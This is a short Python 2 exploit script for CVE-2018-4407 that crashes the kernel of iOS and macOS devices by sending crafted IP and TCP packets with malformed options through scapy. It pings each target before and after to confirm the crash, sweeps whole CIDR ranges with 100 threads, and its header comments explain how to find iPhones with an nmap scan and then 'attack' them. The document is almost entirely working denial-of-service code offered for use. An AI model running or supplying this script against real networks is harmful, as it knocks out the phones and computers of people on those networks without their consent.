CVE_2018_4407.py

#!/usr/bin/env python
#
# CVE-2018-4407 IOS/macOS kernel crash
# 
# Usage: python CVE_2018_4407.py IP/CIDR
# 
# python CVE-2018_4407.py 192.168.1.1
# python CVE_2018_4407.py 192.168.1.0/24
#
# find iphone
#     namp -sS -p 62078 --open 192.168.1.0/24
# attack
#     python CVE_2018_4407.py iphone_ip
# 

import re
import os
import sys
import time
import Queue
import threading
from netaddr import IPNetwork
from subprocess import Popen, PIPE
from scapy.all import send, IP, TCP, IPOption

result = []

def ping_scan(ip):
    if os.name == "nt":
        try:
            p=Popen('ping -n 1 ' + ip, stdout=PIPE)
        except:
            sys.exit("[*] Can't ping")
        if p.stdout.read().find("TTL") != -1: return True
    else:
        try:
            p=Popen(['ping','-c 1',ip], stdout=PIPE, stderr=PIPE)
        except:
            sys.exit("[*] Can't ping")
        if p.stdout.read().find("1 received") != -1: return True
    return False

def kernel_crash(target_ip):
    try:
        if ping_scan(target_ip):
            #print "[*] %-15s is up"%(target_ip)
            #print "[*] Crashing %-15s..."%(target_ip)
            for i in range(8, 20):
                send(IP(dst=target_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
            #print "[*] Send packge over"
            time.sleep(1)
            result = "[+] %-15s is down and attack succeed by CVE-2018-4407"%(target_ip) if not ping_scan(target_ip) else "[-] %-15s is up but attack failed"%(target_ip)
            return result
        else:
            return "[-] %-15s seems down now"%(target_ip)
    except Exception as e:
        sys.exit(e)

class MyThread(threading.Thread):
    def __init__(self, q):
        threading.Thread.__init__(self)
        self.q = q

    def run(self):
        while True:
            try:
                task = self.q.get(block = True, timeout = 1)
            except:
                break
            try:
                result.append(kernel_crash(task))
                self.q.task_done()
            except Exception as e:
                sys.exit(e)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("[*] Usage: %s IP/CIDR"%(sys.argv[0]))
    try:
        ips = IPNetwork(sys.argv[1])
    except:
        sys.exit("[*] IP format error")

    q = Queue.Queue()
    map(lambda x: q.put(x), [str(ip.format()) for ip in ips])
    map(lambda x: x.start(), [MyThread(q) for i in range(100)])
    q.join()

    map(lambda x: sys.stdout.write(x+'\n'), result)